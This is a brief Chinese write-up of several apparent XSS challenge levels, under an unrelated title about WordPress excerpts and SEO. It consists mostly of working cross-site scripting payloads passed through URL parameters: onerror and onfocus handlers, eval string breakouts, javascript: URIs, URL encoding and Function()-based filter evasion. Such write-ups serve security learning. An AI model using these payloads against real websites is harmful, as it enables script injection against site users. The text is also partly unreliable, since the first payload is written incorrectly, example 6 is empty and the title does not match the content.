wordpress 摘要不显示seo前线

例1

本题通过get接收并传递参数，所有参数不经过过滤直接放入h2标签里面。

要求

1.需要页面弹出1337
2.不能与用户交互

官方认为innerHTML中script标签不安全，所以将其禁用，但只禁用了此标签，所以我们可以使用其它标签来进行弹窗。

这里我们可以直接使用img标签。

<img src = 1 onerror ="alert=1337">

例2

代码解析

1.当给jeff传值时显示所传值，无值时显示JEFFF
2.eval中将Ma name $(jeff)赋值给ma
3.将ma放入h2标签下
setTimeout 1000 表示在一秒后执行一次。

方法

由于maname使用了innerText属性，所以传递到maname的内容均为文本，无法执行代码，因此我们就可以将eval中的代码闭合来执行我们的恶意代码。

?jeff=1";alert(1337);"

例3

?wey=aaa"onfocus = alert(1337) autofocus="

例4

?ricardo=javascript:alert(1337)

例5

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

例6

例7

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

例8

?boomer=<a%20id=ok%20href="tel:alert(1337)">